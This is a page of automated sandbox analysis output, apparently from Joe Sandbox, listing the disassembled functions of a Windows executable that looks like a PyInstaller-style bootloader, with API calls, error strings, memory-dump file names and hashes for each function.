Opcode Fuzzy Hash: 3b80d661a596547bf866741e2a38b529870fc82556ae20f68faf990c170632bb
Instruction Fuzzy Hash: 3F417E21B0868386EA10FB79D8005B9E3A0EF48794FC84532ED4D07BA5DE3CE561CFA0

Function 00007FF72B8D1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF72B8D1276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF72B8D12EF
malloc, xrefs: 00007FF72B8D12C1, 00007FF72B8D12F6
1.3.1, xrefs: 00007FF72B8D1249
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF72B8D141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF72B8D12BA

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 9b2da8e32cee601306ebcebf5d16e93c03482fa50eddd1a53150bf2cf71a648a
Instruction ID: 70982729061d2ee812199c06d9d71a0232f84629ba6655aece818a46d1b3a1eb
Opcode Fuzzy Hash: 9b2da8e32cee601306ebcebf5d16e93c03482fa50eddd1a53150bf2cf71a648a
Instruction Fuzzy Hash: E951C722A0868381EA20BB69EC403BAE291FF49794FC44136ED4D477E5DE3CE551CB90

Function 00007FF72B8EED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF72B8EF0AA,?,?,-00000018,00007FF72B8EAD53,?,?,?,00007FF72B8EAC4A,?,?,?,00007FF72B8E5F3E), ref: 00007FF72B8EEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF72B8EF0AA,?,?,-00000018,00007FF72B8EAD53,?,?,?,00007FF72B8EAC4A,?,?,?,00007FF72B8E5F3E), ref: 00007FF72B8EEE98

Strings

api-ms-, xrefs: 00007FF72B8EEDD6
ext-ms-, xrefs: 00007FF72B8EEDE9

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 6c36cc289b2c5ddd2c530575b7c81bb2694fff85a8ed1fea88389ae8b79363d1
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 93416662B18A4381FA51EB5E9C00675A391FF48BD0FC84535ED1D47BA4EF3CE8248BA0

Function 00007FF72B8D36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF72B8D3804), ref: 00007FF72B8D36E1
GetLastError.KERNEL32(?,00007FF72B8D3804), ref: 00007FF72B8D36EB

Part of subcall function 00007FF72B8D2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2C9E
Part of subcall function 00007FF72B8D2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2D63
Part of subcall function 00007FF72B8D2C50: MessageBoxW.USER32 ref: 00007FF72B8D2D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF72B8D3790
Failed to obtain executable path., xrefs: 00007FF72B8D36F3
GetModuleFileNameW, xrefs: 00007FF72B8D36FA
Failed to resolve full path to executable %ls., xrefs: 00007FF72B8D3739
\\?\, xrefs: 00007FF72B8D375A

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: c99aa29a0c735624d203afccad223d355c7bb9937555e98453bc0679cc027d00
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: F3215151B1C94381FA21BB39EC103B6A260FF98394FC04136D65D825F5EE2CE624CFA0

Function 00007FF72B8EBA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EBE89

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
Instruction ID: e23871be3cada3db13a2e8b4bad44665a974c2f0483f515fe474b1232877768e
Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
Instruction Fuzzy Hash: 18C1D722A0C6C791E6607B9998802BDB791EB85B90FD94131FA4D037B1CE7CE4658FA0

Function 00007FF72B8D6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ucrtbase.dll, xrefs: 00007FF72B8D63DD
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF72B8D63C7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF72B8D6407
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF72B8D6456
Failed to load Python DLL '%ls'., xrefs: 00007FF72B8D64A7
LoadLibrary, xrefs: 00007FF72B8D64AE

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction ID: 8a2694a0a89e62a4bc7ef1fea782f1af076d9b140534edd3fb316c979a12473f
Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction Fuzzy Hash: 43415321A1868791EA15FB38E8541E9A311FF54384FC00133DA5D436A5DF3CF625CFA0

Function 00007FF72B8E5628 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E5655
CreateFileW.KERNELBASE ref: 00007FF72B8E5694
CloseHandle.KERNEL32 ref: 00007FF72B8E56C9

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: d8d54f81faa141709e7f36f6ce808371c2732d028ecd045e9bd3cdb547db9683
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: 83418622D287C183E750AF64D9103A9A3A0FB95764F509335F65C03AE6DF7CA5F08BA0

Function 00007FF72B8DCC3C Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8DCE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF72B8DCE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF72B8DCC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF72B8DCCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF72B8DCD21

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 824dbe80b0b410ccabe1df417a11a0a2bbb05fb2f5412c2559b5a5bf50a8c691
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: E0313720E4814381EA54BB7D9C522B9A681DF92384FC45036EB4E472F3DE6CA8248FA0

Function 00007FF72B8E9A30 Relevance: 4.5, APIs: 3, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF72B8E9A2C), ref: 00007FF72B8E9A41
TerminateProcess.KERNEL32(?,?,?,00007FF72B8E9A2C), ref: 00007FF72B8E9A4C
ExitProcess.KERNEL32 ref: 00007FF72B8E9A5B

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: fbd9ade996f63501f7526e35cb1984e9f3324b44783111c1c296440814e80ca3
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 7BD09E10F0874642EB143BB85C591789256EF58701FD4143CD91F063B3DD7CF8694BA0

Function 00007FF72B8E013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E0277

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 9bd733ee343d8ad1255975108555ebbf3eb1a36e1a3cb2200df24f79fbb146fa
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 09512D21B092C186E725B9AD9C0167AE191EF44BA4F884B34FD7C077E5CE3CD4219EA0

Function 00007FF72B8EAB58 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72B8EA9D5,?,?,00000000,00007FF72B8EAA8A), ref: 00007FF72B8EABC6
GetLastError.KERNEL32(?,?,?,00007FF72B8EA9D5,?,?,00000000,00007FF72B8EAA8A), ref: 00007FF72B8EABD0

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 4b4851903d0cc304c49270510b3e9958e5155dbcc2857228cdc93d188fed74a1
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: FF21A411B186C241EA9077D99C9037DA692DFC4BA0F884239F93E477F1CF7CA4614B60

Function 00007FF72B8EC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF72B8EC2CD), ref: 00007FF72B8EC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF72B8EC2CD), ref: 00007FF72B8EC18A

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: c77ad4f46475d30c5088ec27f317409ecb6bdeab6c1681986e041755f947e590
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 8A118661A18A8181DA10AB59AC54169A351EB45FF4F944331FE7D077E5CE7CD0618F50

Function 00007FF72B8EBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EBED4

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 7a6f6b4603a9e5d9ce79d5380e24987dbb4674ea0fe9f41af404b33429e7a2ec
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: BB41B8329186C187EA34AA6DE980179B7E0EB55B44F940131FA9E476E1CF7CE412CFA1

Function 00007FF72B8D7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF72B8D803A

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 09e0edd5bfc77bffd2ce204413b85077ed061b6568614956a0855b02b1706b89
Instruction ID: 573ea8efdd5ced66f2bbdc4c9127c177c475d6e28cbd7525800de1b79dda0410
Opcode Fuzzy Hash: 09e0edd5bfc77bffd2ce204413b85077ed061b6568614956a0855b02b1706b89
Instruction Fuzzy Hash: 7721A221B1869246EA10BA6A6C047BAD651FF45FD4FCC4831EE0C07796CE7DF851CB90

Function 00007FF72B8EB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EB9C2

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: c366781705c6da18860b705d59e1fb4b9fe2c25167d3c47e5bc244d910ba9ee8
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: 27317022E1869285E7117B998C8137CAA90EF84BA4FD60135F95D073E2DE7CE4618FB1

Function 00007FF72B8E9961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B8E998F

Part of subcall function 00007FF72B8E9A88: GetModuleHandleExW.KERNEL32 ref: 00007FF72B8E9AAD
Part of subcall function 00007FF72B8E9A88: GetProcAddress.KERNEL32 ref: 00007FF72B8E9AC3
Part of subcall function 00007FF72B8E9A88: FreeLibrary.KERNEL32 ref: 00007FF72B8E9AEA

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 10feab5a90f84a908fa07507b7ff9917432793431ef952591c05441842527ec7
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 4F219272E0478589EB24AFA8C8806FC73A4FB44718F844636E76D06AE6DF7CD554CB90

Function 00007FF72B8E5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E5EF9

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: f6de8b4d22daed0bd73333f0d4fb35443b6fd00b4ef8fb15206bf2496e859aba
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 78113321A1C6C241EA60BF9998011BDE2A4FF85B84F844431FA4C5BAA7CF7DD5204BA0

Function 00007FF72B8F6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F6377

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
